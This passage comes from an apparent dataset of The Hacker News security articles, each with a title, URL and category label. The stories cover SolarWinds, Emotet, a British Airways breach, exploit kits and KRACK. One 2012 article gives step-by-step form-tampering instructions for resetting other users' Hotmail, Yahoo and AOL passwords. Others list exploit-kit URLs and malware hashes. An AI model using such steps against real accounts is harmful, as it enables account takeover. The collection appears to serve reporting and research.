attackers. 44% of the victims are in the information technology sector, including software firms, IT services, and equipment providers. CISA Issues New Advisory The development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) published a fresh advisory, stating the ""APT actor [behind the compromises] has demonstrated patience, operational security, and complex tradecraft in these intrusions."" ""This threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations,"" it added. But in a twist, the agency also said it identified additional initial infection vectors, other than the SolarWinds Orion platform, that have been leveraged by the adversary to mount the attacks, including a previously stolen key to circumvent Duo's multi-factor authentication (MFA) to access the mailbox of a user via Outlook Web App (OWA) service. Digital forensics firm Volexity, which tracks the actor under the moniker Dark Halo, said the MFA bypass was one of the three incidents between late 2019 and 2020 aimed at a US-based think tank. The entire intrusion campaign came to light earlier this week when FireEye disclosed it had detected a breach that also pilfered its Red Team penetration testing tools. Since then, a number of agencies have been found to be attacked, including the US departments of Treasury, Commerce, Homeland Security, and Energy, the National Nuclear Security Administration (NNSA), and several state department networks. While many details continue to remain unclear, the revelation about new modes of attack raises more questions about the level of access the attackers were able to gain across government and corporate systems worldwide. Microsoft, FireEye, and GoDaddy Create a Killswitch Over the last few days, Microsoft, FireEye, and GoDaddy seized control over one of the main GoDaddy domains — avsvmcloud[.]com — that was used by the hackers to communicate with the compromised systems, reconfiguring it to create a killswitch that would prevent the SUNBURST malware from continuing to operate on victims' networks. For its part, SolarWinds has not yet disclosed how exactly the attacker managed to gain extensive access to its systems to be able to insert malware into the company's legitimate software updates. Recent evidence, however, points to a compromise of its build and software release system. An estimated 18,000 Orion customers are said to have downloaded the updates containing the back door. Symantec, which earlier uncovered more than 2,000 systems belonging to 100 customers that received the trojanized SolarWinds Orion updates, has now confirmed the deployment of a separate second-stage payload called Teardrop that's used to install the Cobalt Strike Beacon against select targets of interest. The hacks are believed to be the work of APT29, a Russian threat group also known as Cozy Bear, which has been linked to a series of breaches of critical US infrastructure over the past year. The latest slew of intrusions has also led CISA, the US Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI) to issue a joint statement, stating the agencies are gathering intelligence in order to attribute, pursue, and disrupt the responsible threat actors. Calling for stronger steps to hold nation-states accountable for cyberattacks, Smith said the attacks represent ""an act of recklessness that created a serious technological vulnerability for the United States and the world."" ""In effect, this is not just an attack on specific targets, but on the trust and reliability of the world's critical infrastructure in order to advance one nation's intelligence agency,"" he added. ",Cyber_Attack Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released,https://thehackernews.com/2013/10/web-hosting-software-whmcs-vulnerable.html,"WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed. The vulnerability was publicly posted by a user named as 'localhost' on October 3rd, 2013 and also reported by several users on various Hosting related Forums. He also released a proof-of-concept exploit code for this SQL injection vulnerability in WHMCS. WHMCS says, as the updates have ""critical security impacts."", enables attackers to execute SQL injection attacks against WHMCS deployments in order to extract or modify sensitive information from their databases i.e. Including information about existing accounts, their hashed passwords, which can result in the compromise of the administrator account. Yesterday a group of Palestinian hackers, named as KDMS Team possibly used the same vulnerability against one of the largest Hosting provider - LeaseWeb. After obtaining the credentials, attackers were able to deface the website using DNS hijacking. While all versions of WHMCS are affected by this vulnerability, WHMCS v5.2.8 and v5.1.10 have been released to address this specific SQL injection vulnerability. Just after the release of exploit online, CloudFlare added a ruleset to their Web Application Firewall (WAF) to block the specific attack vector. They mentioned that CloudFlare Hosting partners behind CloudFlare's WAF can enable the WHMCS Ruleset and implement best practices to be fully protected from the attack. Update (2:17 PM Monday, October 7, 2013 GMT): LeaseWeb replied The Hacker News and posted updates on their blog, ""This DNS hijack was quickly detected and rectified by LeaseWeb's security department."" ""The unauthorized name server change for leaseweb.com took place at our registrar on Saturday 5 October, around 19:00 hours CET / 1 PM EST."" ""Our security investigation so far shows that no domains other than leaseweb.com were accessed and changed. No internal systems were compromised."" ""Details of how exactly the hijack could have happened are not yet 100% clear at the moment of writing."" LeaseWeb also explained The Hacker News that They don't use WHMCS-software (which is currently vulnerable to a zero day SQL Injection flaw) and they have their own in-house developed software for the Client Billing system. ""Right now, it appears that the hijackers obtained the domain administrator password and used that information to access the registrar."" ",Vulnerability Israeli Think Tank Compromised to Serve Sweet Orange Exploit Kit,https://thehackernews.com/2014/09/israeli-think-tank-compromised-to-serve_9.html,"The official website of a prominent Israel-based, Middle East foreign policy-focused think tank, the Jerusalem Center for Public Affairs (JCPA), has been compromised and abused by attackers to distribute malware. The Israeli think tank website JCPA – an independent research institute focusing on Israeli security, regional diplomacy and international law – was serving the Sweet Orange exploit kit via drive-by downloads to push malware onto the computers of the website's visitors by exploiting software vulnerabilities, researchers from security firm Cyphort reported on Friday. The Sweet Orange is one of the most recently released web malware exploitation kits, available for sale at selected invite-only cyber crime friendly communities and has been around for quite some time. However, Sweet Orange has also disappeared but in October 2013, shortly after the arrest of Paunch, the author of BlackHole, experts observed a major increase in the use of Sweet Orange. The analysis carried out by Cyphort security firm indicates that the attack on JCPA website is part of a wide malware campaign. It has been discovering several infected website on daily bases and found an initial redirection server as a common thread between the attacks. Following the initial redirection server, Cyphort notes that the innocent users from music industry and law firms are being redirected to a link in the infection chain. Ultimately, users are led to an exploit server located in Russia. ""This is a sinkhole that is connected to many such varying domain names,"" explains McEnroe Navaraj of Cyphort. ""All of these names have some string of 'cdn' in them. Once the bad actors get access to an account/server they can just create a corresponding 'cdn' domain entry under that domain and use it to point to the target exploit server."" This method allows an attacker to bypass a lot of the URL categorization and URL blacklisting technologies. The JCPA website's homepage is infected with a malicious Jquery JavaScript file. The Jquery JavaScript file receives an exploit kit server URL from another domain, ""cdn[dot]jameswoodwardmusic[dot]com."" Ultimately, the exploits are served from ""cdn3[dot]thecritico[dot]com:16122/clickheat/stargalaxy.php?nebua=3."" Finally, the user is attacked via a series of Java and Internet Explorer exploits that were used to deliver an information-stealing Trojan dubbed Qbot. ""The final dropper is downloaded in encrypted form and decrypted in-memory (key: investor) and written to disk,"" Navaraj explains. ""This exploit kit served two (Qbot) binaries with same hash (MD5: 4ff506fe8b390478524477503a76f91a). Encrypted binary transfer is done to hide it from signature-based network security devices such as IPS or AV gateways."" The malware has self modifying capability as well as anti-virtual machine and anti-antivirus detection modules built in, in order to evade detection. Once infected a machine, the malware has capability to steal machine operating system install dates, names, and product IDs. But most weirdly, the malware contains a link to an flv file for a ""Wheat Thins"" advertisement, which indicates that probably the attackers are using the malwares as a click-fraud to make some extra dollars. Meanwhile, the malware also attempts to block users from accessing various anti-virus companies websites, as well as steals login credentials from a long list of prominent banks, including PNC, Zions Bank, Sovereign Bank, SunTrust, Bank of America, J.P. Morgan, Wells Fargo, Citi Bank, Wachovia, TD Bank and many more. The security firm says it has notified the think tank via the contact form on its website, but received no response. ",Malware "British Airways Hacked – 380,000 Payment Cards Compromised",https://thehackernews.com/2018/09/british-airways-data-breach.html,"British Airways, who describes itself as ""The World's Favorite Airline,"" has confirmed a data breach that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks. So who exactly are victims? In a statement released by British Airways on Thursday, customers booking flights on its website (ba.com) and British Airways mobile app between late 21 August and 5 September were compromised. The airline advised customers who made bookings during that 15 days period and believe they may have been affected by this incident to ""contact their banks or credit card providers and follow their recommended advice."" British Airways stated on its Twitter account that personal details stolen in the breach included their customers' names and addresses, along with their financial information, but the company assured its customers that the hackers did not get away with their passport numbers or travel details. The company also said that saved cards on its website and mobile app are not compromised in the breach. Only cards that have been used by you to make booking payments during the affected period are stolen. ""We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app,"" the company said in a statement. ""The stolen data did not include travel or passport details."" Although the statement released by the did not mention the number of affected customers, the company's spokesperson confirmed to the media that some 380,000 payment cards were compromised in the breach. Also currently, it is not clear how the data breach occurred, but some media outlets are reporting that the breach was identified when ""a third party noticed some unusual activity"" and informed the company about it. A spokesperson from British Airways confirmed The Hacker News that ""this is data theft, rather than a breach,"" which suggests someone with privileged access to the data might have stolen it. British Airways also informed the police and the Information Commissioner and currently reaching out to affected customers directly. However, the company assured its customers that the security breach has now been resolved, and its website is working normally and is now safe for passengers to check-in online, and book flights online. The National Crime Agency is aware of the British Airways data breach and is ""working with partners to assess the best course of action."" Air Canada also suffered a severe data breach late last month, which, along with personal data, also exposed passport number and other passport and travel details of about 20,000 mobile app customers. ",Data_Breaches New Variant of Emotet Banking Malware targets German Users,https://thehackernews.com/2015/01/emotet-banking-malware.html,"A new Spam email campaign making the rounds in Germany are delivering a new variant of a powerful banking malware, a financial threat designed to steal users' online banking credentials, according to security researchers from Microsoft. The malware, identified as Emotet, was first spotted last June by security vendors at Trend Micro. The most standout features of Emotet is its network sniffing ability, which enables it to capture data sent over secured HTTPS connections by hooking into eight network APIs, according to Trend Micro. Microsoft has been monitoring a new variant of Emotet banking malware, Trojan:Win32/Emotet.C, since November last year. This new variant was sent out as part of a spam email campaign that peaked in November. Emotet has been distributed through spam messages, which either contain a link to a website hosting the malware or a PDF document icon that is actually the malware. HeungSoo Kang of Microsoft's Malware Protection Center identified a sample of the spam email message that was written in German, including a link to a compromised website. This indicates that the campaign primarily targeted mostly German-language speakers and banking websites. The spam messages are written in such a way that it easily gain the attention of potential victims. It could masquerade as some sort of fraudulent claim, such as a phone bill, an invoice from a bank or a message from PayPal. Once it infect a system, Emotet downloads a configuration file which contains a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic. Network sniffing is especially a disturbing part of this malware because in that a cyber criminal becomes omniscient to all information being exchanged over the network. In short, users can go about with their online banking without even realizing that their data is being stolen. Emotet will pull credentials from a variety of email programs, including versions of Microsoft's Outlook, Mozilla's Thunderbird and instant messaging programs such as Yahoo Messenger and Windows Live Messenger. All the stolen information is sent back to Emotet's ""command and control (C&C) server where it is used by other components to send spam emails to spread the threat,"" Kang wrote. ""We detect the Emotet spamming component as Spammer:Win32/Cetsiol.A."" Spam emails containing Emotet malware are difficult for email servers to filter because the messages actually originate from legitimate email accounts. Therefore, typical anti-spam techniques, such as callback verification, won't be applicable on it. However, there is one technique to stop these spam messages — just reject all those messages that come from bogus accounts by checking whether the account from which you have received the spam email really exists or not. Users are also advised not to open or click on links and attachments that are provided in any suspicious email, but if the message is from your banking institution and of concern to you, then confirm it twice before proceeding. ",Malware "Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities",https://thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html,"Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose. Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: ""On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected."" Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result. Here Below Hacker Demonstrated Vulnerabilities: 1.) Hotmail : Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx . Step 2. Enter the Target Email and enter the 6 characters you see. Step 3. Start Tamper Data Step 4. Delete Element ""SendEmail_ContinueCmd"" Step 5. change Element ""__V_previousForm"" to ""ResetOptionForm"" Step 6. Change Element ""__viewstate"" to ""%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"" Step 7. Click O.K and Type THe new Password Step 8. sTart TamperDaTa and Add Element ""__V_SecretAnswerProof"" Proof not constant Like the old Exploit ""++++"" You need new Proof Every Time 2.) Yahoo Step 1. Go to this page https://edit.yahoo.com/forgot . Step 2. EnTer the Target Email . and Enter the 6 characters you see . Step 3. Start Tamper Data Delete Step 4. change Element ""Stage"" to ""fe200"" Step 5. Click O.K and Type The new Password Step 6. Start Tamper Data All in Element Z Step 7.done 3.) AOL: Step 1. Go to Reset Page Step 2. EnTer the Target Email . and Enter the characters you see . Step 3. Start Tamper Data Step 4. change Element ""action"" to ""pwdReset"" Step 5. change Element ""isSiteStateEncoded"" to ""false"" Step 6. Click O.K and Type THe new Password Step 7. Start TamperDaTa All in Element rndNO Step 8. done We have reported the issue via Twitter to official security response team at Microsoft. ",Vulnerability "Ashley Madison 2.0 — Hackers Leak 20GB Data Dump, Including CEO's Emails",https://thehackernews.com/2015/08/ashley-madison-hack.html,"The Impact Team – Wait, Cheaters! We haven't yet done. The group of hackers behind the breach of Ashley Madison, the popular cheater's dating service, have released a second, even much bigger 'cheat sheet' exposing sensitive materials that include sensitive corporate information. Two days ago, the hackers released nearly 10GB of its customers' personal data online, which included 36 million emails and hashed passwords, 9.6 Million Credit Card Transactions records and their associated usernames. Nearly 20GB of Ashley Madison Internal Data LEAKED This time, the Impact Team leaked nearly 20GB worth of what appears to be internal data – not customers' data – from the adultery website on the dark Web. The leaked data appears to include the source code for the site, as well as a massive amount of e-mail from Ashley Madison parent company's Avid Life Media CEO Noel Biderman. According to the researcher, who analysed the leaked data, the TL;DR of the leak is: The leak contains lots of Source Code 73 different git repositories are present Ashley Madison used gitlab internally The 13GB compressed file appears to contain Ashley Madison CEO's emails seems corrupted The leak contains plain text or poorly hashed (md5) db credentials Personal Emails of Avid Life Media CEO Noel Biderman Exposed The trove of information was dumped with a taunting message to the adultery website's founder posted on the same dark web hosting the earlier data dump. The message reads: ""Hey Noel, you can admit it's real now."" – presumably directed at CEO Noel Biderman, who has refused to recognize the data is all legitimate. Dave Kennedy, the founder of cyber security company TrustedSec LLC, has analysed the second data dump and confirmed that it contained nearly 1GB of Biderman's emails. ""The dump appears to contain all of the business/corporate e-mails, the source code for all of [Avid Life Media's] websites, mobile applications, and more,"" TrustedSec wrote in its official blog post published yesterday. This is really interesting; having the complete source code to these websites means that hackers now are capable of finding new security holes in Avid Life's websites, and further compromise them more. However, we have yet to wait for a response to this new release from Avid Life Media officials. If they do, we'll update this post accordingly. ",Data_Breaches US Govt Warns Critical Industries After Ransomware Hits Gas Pipeline Facility,https://thehackernews.com/2020/02/critical-infrastructure-ransomware-attack.html,"The U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) earlier today issued a warning to all industries operating critical infrastructures about a new ransomware threat that if left unaddressed could have severe consequences. The advisory comes in response to a cyberattack targeting an unnamed natural gas compression facility that employed spear-phishing to deliver ransomware to the company's internal network, encrypting critical data and knocking servers out of operation for almost two days. ""A cyber threat actor used a spear-phishing link to obtain initial access to the organization's information technology network before pivoting to its operational technology network. The threat actor then deployed commodity ransomware to encrypt data for impact on both networks,"" CISA noted in its alert. As ransomware attacks continue to escalate in frequency and scale, the new development is yet another indication that phishing attacks continue to be an effective means to bypass security barriers and that hackers don't always need to exploit security vulnerabilities to breach organizations. CISA highlighted that the attack did not impact any programmable logic controllers (PLCs) and that the victim did not lose control of its operations. But in the aftermath of the incident, the company is reported to have initiated a deliberate operational shutdown, resulting in a loss of productivity and revenue. Noting that the impact was limited to Windows-based systems and assets located in a single geographic locality, it said the company was able to recover from the attack by getting hold of replacement equipment and loading last-known-good configurations. Although the notification is lean on the specifics of the attack, this is not the first time phishing links have been employed to deliver ransomware. Lake City's I.T. network was crippled last June after an employee inadvertently opened a suspicious email that downloaded the Emotet Trojan, which in turn downloaded TrickBot Trojan and Ryuk ransomware. The evolving threat landscape means companies need to consider the full scope of threats posed to their operations, including maintaining periodic data backups and devising fail-over mechanisms in the event of a shutdown. Aside from securing the email channel and identifying and protecting the most attacked individuals, this also underscores the need for adopting appropriate anti-phishing measures to stop social engineering attempts from reaching their targets' inboxes and training people to spot mails that get through. Additionally, it's imperative that vulnerable organizations safeguard the digital supply chain by segmenting critical network infrastructure using firewalls and conducting periodic security audits to identify gaps and weaknesses. For a full list of mitigative measures that can be undertaken, head to the CISA advisory here. Update: Cybersecurity firm Dragos issued an assessment on Wednesday linking the attack on the facility to an alert put out by the US Coast Guard in December. The Ryuk ransomware infection had forced the facility to shut down for 30 hours, disrupting camera and physical access control systems, along with shutting down the entire corporate IT network at the facility. The analysis cited overlaps in the outage period between the two reports, the impact on Windows-based systems, and the primary attack vector being an email message containing a malicious link. ",Cyber_Attack Malware that turns computers into Bitcoin miners,https://thehackernews.com/2013/04/malware-that-turns-computers-into.html,"Researchers from Kaspersky Lab have discovered a new spam message campaign being transmitted via Skype contains malware capable of using an infected computer to mine for Bitcoins. The malware, identified as Trojan.Win32.Jorik.IRCbot.xkt. Bitcoin is a non-governmental, fully-digital currency based on an open-source and peer-to-peer internet protocol. Cybercriminals have figured out that distributed Bitcoin mining is a perfect task for botnets and have started developing malware that can abuse the CPUs and GPUs of infected computers to generate Bitcoins. ""Bitcoin mining is the process of making computer hardware do mathematical calculations for the Bitcoin network to confirm transactions and increase security,"" Victims are encouraged to install malware file that is included with messages like ""this my favourite picture of you"". Those who click the links, infected with a virus dropper downloaded from a server in India. If the malicious file is installed, one of its features is to turn the machine into a Bitcoin mining slave. Turning unwitting PCs into Bitcoin slaves is the latest attack to hit Bitcoin and Bitcoin-related services. Most anti-malware programs cannot detect the malware. The malware has the fingerprints of script kids, rather than sophisticated hackers. According to Kaspersky Lab, the average click rate for the rogue URL is high, at over 2,000 clicks per hour. ""Most of potential victims live in Italy then Russia, Poland, Costa Rica, Spain, Germany, Ukraine and others,"" ",Malware "Wait ! It's not just Stuxnet or DuQu , Kaspersky reveals 5 more cousins",https://thehackernews.com/2012/01/wait-its-not-just-stuxnet-or-duqu.html,"Wait ! It's not just Stuxnet or DuQu , Kaspersky reveals 5 more cousins Russian computer security outfit Kaspersky Lab said that the Stuxnet virus that damaged Iran's nuclear programme was likely to be one of at least five cyber weapons developed on a single platform. The viruses have never been seen 'in the wild' - and it's unclear whether they, like Stuxnet, would be built to cause failures at nuclear plants, or engineered for another purpose. Both Stuxnet and Duqu appear to have been created back in late 2007 or early 2008, and other pieces of malware with similar capabilities were built on the same platform, Gostev said. Gostev examined two key drivers and variants that were used in both Stuxnet and Duqu, as well as two previously unknown drivers that were similar to the ones used. Not only did the same group of people develop Stuxnet and Duqu, but they likely worked simultaneously on multiple variants, Gostev said. The other pieces may be in the wild and not yet detected, or the developers may have decided not to release them, he said. Overall, Kaspersky found seven types of drivers from the family with similar characteristics, and for three of them there's no knowledge of which malicious program they were used in conjunction with.Alexander Gostev, Chief Security Expert at Kaspersky, commented: ""The drivers from the still unknown malicious programs cannot be attributed to activity of the Stuxnet and Duqu Trojans. The methods of dissemination of Stuxnet would have brought about a large number of infections with these drivers; and they can't be attributed either to the more targeted Duqu Trojan due to the compilation date."" Researchers with Kaspersky have not found any new types of malware built on the Tilded platform, Raiu said, but they are fairly certain that they exist because shared components of Stuxnet and Duqu appear to be searching for their kin.When a machine becomes infected with Duqu or Stuxnet, the programs search for two unique registry keys on the PC linked to Duqu and Stuxnet that are then used to load the main piece of malware onto the computer, he said. ""We believe Duqu and Stuxnet were simultaneous projects supported by the same team of developers,"" Gostev wrote. The developers are tweaking ready-made files instead of creating new drivers from scratch, which allows them to make as many different driver files as they like, each having exactly the same functionality and creation date, Gostev said. These files can also be signed with legitimate digital certificates and packaged into different variants. ",Vulnerability FBI's Cyber Task Force Identifies Stealthy FF-RATs used in Cyber Attack,https://thehackernews.com/2015/09/stealthy-malware-cyber-attack.html,"In both April and June this year, a series of cyber attacks was conducted against the United States Office of Personnel Management (OPM). These attacks resulted in 21 million current and former Federal government employees' information being stolen. After months of investigation, the FBI's Cyber Task Force identified several Remote Access Tools (RATs) that were used to carry out the attack. One of the more effective tools discovered is named 'FF-RAT'. FF-RAT evades endpoint detection through stealth tactics, including the ability to download DLLs remotely and execute them in memory only. Hackers use RATs to gain unlimited access to infected endpoints. Once the victim's access privilege is acquired, it is then used for malware deployment, command and control (C&C) server communication, and data exfiltration. Most Advanced Persistent Threat (APT) attacks also take advantage of RAT functionality for bypassing strong authentication, reconnaissance, spreading infection, and accessing sensitive applications to exfiltrate data. In order to mitigate these types of attacks, it is key that you have tools and methods in place for early detection. It's important these attacks are identified in time for you to isolate infected assets and remediate issues before they spread or move to a second stage (deploying additional malware, stealing important data, acting as its own C&C server, etc.) How this affects you When deploying a RAT, a hacker's primary goal is to create a backdoor to infected systems so they can gain complete control over that system. When a RAT is installed on your system, the attacker is then able to view, change, or manipulate data on the infected machine. This leaves you open to your, and possibly your clients', sensitive data being stolen. Often, a single RAT is deployed as a pivot point to deploy additional malware in the local network or use the infected system to host malware for remote retrieval. How AlienVault Helps AlienVault Labs, AlienVault's team of security researchers, continue to perform cutting edge research on these types of threats. They collect large amounts of data and then create expert threat intelligence correlation directives, IDS signatures, vulnerability audits, asset discovery signatures, IP reputation data, data source plugins, and report templates. Activity from FF-RAT can be detected through IDS signatures and a correlation rule that the Labs team has released to the AlienVault Unified Security Management (USM) platform. Learn more about AlienVault USM: Download a free 30-day trial Watch a demo on-demand Play with USM in our product sandbox (no download required) ",Malware RawCap sniffer for Windows released !,https://thehackernews.com/2011/04/rawcap-sniffer-for-windows-released.html,"RawCap sniffer for Windows released We are today proude to announce the release of RawCap, which is a free raw sockets sniffer for Windows. Here are some highlights of why RawCap is a great tool to have in your toolset: Can sniff any interface that has got an IP address, including 127.0.0.1 (localhost/loopback) RawCap.exe is just 17 kB No external libraries or DLL's needed No installation required, just download RawCap.exe and sniff Can sniff most interface types, including WiFi and PPP interfaces Minimal memory and CPU load Reliable and simple to use Usage RawCap takes two arguments; the first argument is the IP address or interface number to sniff from, the second is the path/file to write the captured packets to. C:\Tools>RawCap.exe 192.168.0.23 dumpfile.pcap You can also start RawCap without any arguments, which will leave you with an interactive dialog where you can select NIC and filename: C:\Tools>RawCap.exe Network interfaces: 0. 192.168.0.23 Local Area Connection 1. 192.168.0.47 Wireless Network Connection 2. 90.130.211.54 3G UMTS Internet 3. 192.168.111.1 VMware Network Adapter VMnet1 4. 192.168.222.1 VMware Network Adapter VMnet2 5. 127.0.0.1 Loopback Pseudo-Interface Select network interface to sniff [default '0']: 1 Output path or filename [default 'dumpfile.pcap']: Sniffing IP : 192.168.0.47 File : dumpfile.pcap Packets : 1337 For Incident Responders RawCap comes in very handy for incident responders who want to be able to sniff network traffic locally at the clients of the corporate network. Here are a few examples of how RawCap can be used for incident response: A company laptop somewhere on the corporate network is believed to exfiltrate sensitive coporate information to a foreign server on the Internet by using a UMTS 3G connection on a USB dongle. After finding the internal IP address on the corporate network the Incident Response Team (IRT) use the Sysinternals tool PsExec to inject RawCap.exe onto the laptop and sniff the packets being exfiltrated through the 3G connection. The generated pcap file can be used to determine what the external 3G connection was used for. A computer is suspected to be infected with malware that uses an SSL tunnelling proxy (stunnel) to encrypt all Command-and-Control (C&C) communication. The data that is to be sent into the tunnel is first sent unencrypted to localhost (127.0.0.1 aka loopback interface) before it enters the encrypted tunnel. Incident responders can use RawCap to sniff the traffic to/from localhost on the Windows OS, which is something other sniffing tools cannot do. A corporate laptop connected to the companies WPA2 encrypted WiFi is found to have suspicious TCP sessions opened to other computers on the same WiFi network. Incident responders can run RawCap locally on any of those machines in order to capture the WiFi network traffic to/from that machine in unencrypted form. For Penetration Testers RawCap was not designed for pen-testers, but I realize that there are some situations where the tool can come in hany when doing a penetration test. Here are some examples: After getting remote access and admin privileges on a Windows XP machine the pen-tester wanna sniff the network traffic of the machine in order to get hold of additional credentials. Sniffing tools like dumpcap, WinDump and NMCap can unfortunately not be used since no WinPcap or NDIS driver is installed. RawCap does, however, not need any special driver installed since it makes use of the Raw Sockets functionality built into Windows. Pen-testers can therefore run RawCap.exe to sniff traffic without installing any drivers. After getting admin on a box the pen-tester wanna sniff the network traffic, but box uses a WiFi network so traditional sniffing tools won't work. This is when RawCap comes in handy, since it can sniff the WiFi traffic of the owned machine just as easily as if it had been an Ethernet NIC. Download RawCap RawCap Downloaded ",Malware Microsoft Releases 12 Security Updates (5 Critical and 7 Important Patches),https://thehackernews.com/2015/09/windows-security-updates.html,"With the release of 12 Security Bulletins, Microsoft addresses a total of 56 vulnerabilities in its different products. The bulletins include five critical updates, out of which two address vulnerabilities in all versions of Windows. The September Patch Tuesday update (released on second Tuesday of each month) makes a total of 105 Security Bulletins being released this year; which is more than the previous year with still three months remaining for the current year to end. The reason for the increase in the total number of security bulletins within such less time might be because of Windows 10 release and its installation reaching to a score of 100 million. Starting from MS15-094 to MS15-105 (12 security bulletins) Microsoft rates the severity of the vulnerabilities and their impact on the affected software. Bulletins MS15-094 and MS15-095 are the cumulative updates, meaning these are product-specific fixes for security related vulnerabilities that are rated as 'critical' by Microsoft. Bulletins MS15-097 to MS15-099 are also rated as the most critical vulnerabilities with the impact leading to remote code execution (RCE) of the affected software. PATCH UPDATE: CRITICAL FLAWS 1. Cumulative Security Update for Internet Explorer (MS15-094) was present in Internet Explorer 7 through Internet Explorer 11 and was rated 'Critical' on Windows clients and 'Moderate' on Windows servers. The vulnerability could allow an attacker to gain administrative user rights of the victim when the user visits a specially crafted web page set up by the attacker. The security update addresses the flaws by: Modifying how Internet Explorer (IE) handles objects in memory Modifying how IE, JScript, and VBScript handle objects in memory Helping to ensure that IE correctly permits file operations 2. Cumulative Security Update for Microsoft Edge (MS15-095) is for the Microsoft's Edge browser of the newly released Windows 10 where the severity rating is critical for all the Windows 10 clients. The vulnerability was exactly the same as MS15-094 but was present in both Windows Edge and Internet Explorer. The update addresses the flaws by modifying how Microsoft Edge handles objects in memory. 3. RCE Vulnerabilities in Microsoft Graphics Component (MS15-097) allows an attacker to implement remote code execution when the victim accesses specially crafted document or visits an untrusted web page that contains Embedded OpenType fonts (.eot). This security update is rated 'Critical' for: All supported versions of Windows Vista and Windows Server 2008 All affected versions of Microsoft Lync 2013, Microsoft Lync 2010, and Microsoft Live Meeting 2007 All affected versions of Microsoft Office 2007 and Microsoft Office 2010 The vulnerability was resolved by how: Windows Adobe Type Manager Library handles OpenType fonts Windows kernel-mode driver handles objects in memory Windows validates integrity levels to prevent inappropriate process initialization Windows kernel handles memory addresses 4. RCE Vulnerabilities in Windows Journal (MS15-098) lets an attacker remotely execute malicious code if a user opens a specially crafted Journal file. This security update is rated Critical for all supported releases of Windows operating system and addresses the issues by modifying how Windows Journal parses Journal files. 5. RCE Vulnerabilities in Microsoft Office (MS15-099) allows an attacker to exploit the vulnerability present in the Microsoft's Office Suite by gaining access to the victim (user having administrative rights) and running arbitrary code in the name of an authorized user. Though users with limited rights are supposedly safe, and the affected software include: All versions of Microsoft Office 2007 All versions of Microsoft Office 2010 All versions of Microsoft Office 2013 All versions of Microsoft Office 2013 RT The security update addresses the flaws by correcting how Microsoft Office handles files in memory and by modifying how SharePoint validates web requests. PATCH UPDATE: IMPORTANT FLAWS The Other remaining vulnerabilities MS15-096 and from MS15-100 to MS15-105 are rated as 'Important' on Microsoft's severity scale; those are affecting: Microsoft Windows various versions Skype Lync messenger Microsoft Exchange Server Microsoft .NET framework...to name a few The vulnerabilities could allow hackers to conduct attacks such as: Denial of Service Privilege escalation Information breach Other security breaks Microsoft has acknowledged researchers at Google Project Zero, hyp3rlinx, FireEye Inc., Fortinet's FortiGuard Labs, Cisco Talos...and many more as the contributors for helping them providing adequate security to the users. For the updates, you will have to follow the same method of downloading and installing the Windows update for your system. TIP for Windows users: Keep your system's Windows Update settings to ""Check for Updates but let me choose whether to download and install them."" ",Vulnerability KRACK Demo: Critical Key Reinstallation Attack Against Widely-Used WPA2 Wi-Fi Protocol,https://thehackernews.com/2017/10/wpa2-krack-wifi-hacking.html,"Do you think your wireless network is secure because you're using WPA2 encryption? If yes, think again! Security researchers have discovered several key management vulnerabilities in the core of Wi-Fi Protected Access II (WPA2) protocol that could allow an attacker to hack into your Wi-Fi network and eavesdrop on the Internet communications. WPA2 is a 13-year-old WiFi authentication scheme widely used to secure WiFi connections, but the standard has been compromised, impacting almost all Wi-Fi devices—including in our homes and businesses, along with the networking companies that build them. Dubbed KRACK—Key Reinstallation Attack—the proof-of-concept attack demonstrated by a team of researchers works against all modern protected Wi-Fi networks and can be abused to steal sensitive information like credit card numbers, passwords, chat messages, emails, and photos. Since the weaknesses reside in the Wi-Fi standard itself, and not in the implementations or any individual product, any correct implementation of WPA2 is likely affected. According to the researchers, the newly discovered attack works against: Both WPA1 and WPA2, Personal and enterprise networks, Ciphers WPA-TKIP, AES-CCMP, and GCMP In short, if your device supports WiFi, it is most likely affected. During their initial research, the researchers discovered that Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others, are all affected by the KRACK attacks. It should be noted that the KRACK attack does not help attackers recover the targeted WiFi's password; instead, it allows them to decrypt WiFi users' data without cracking or knowing the actual password. So merely changing your Wi-Fi network password does not prevent (or mitigate) KRACK attack. Here's How the KRACK WPA2 Attack Works (PoC Code): Discovered by researcher Mathy Vanhoef of imec-DistriNet, KU Leuven, the KRACK attack works by exploiting a 4-way handshake of the WPA2 protocol that's used to establish a key for encrypting traffic. For a successful KRACK attack, an attacker needs to trick a victim into re-installing an already-in-use key, which is achieved by manipulating and replaying cryptographic handshake messages. ""When the victim reinstalls the key, associated parameters such as the incremental transmit packet number (i.e. nonce) and receive packet number (i.e. replay counter) are reset to their initial value,"" the researcher writes. ""Essentially, to guarantee security, a key should only be installed and used once. Unfortunately, we found this is not guaranteed by the WPA2 protocol. By manipulating cryptographic handshakes, we can abuse this weakness in practice."" The research [PDF], titled Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2, has been published by Mathy Vanhoef of KU Leuven and Frank Piessens of imec-DistriNet, Nitesh Saxena and Maliheh Shirvanian of the University of Alabama at Birmingham, Yong Li of Huawei Technologies, and Sven Schäge of Ruhr-Universität Bochum. The team has successfully 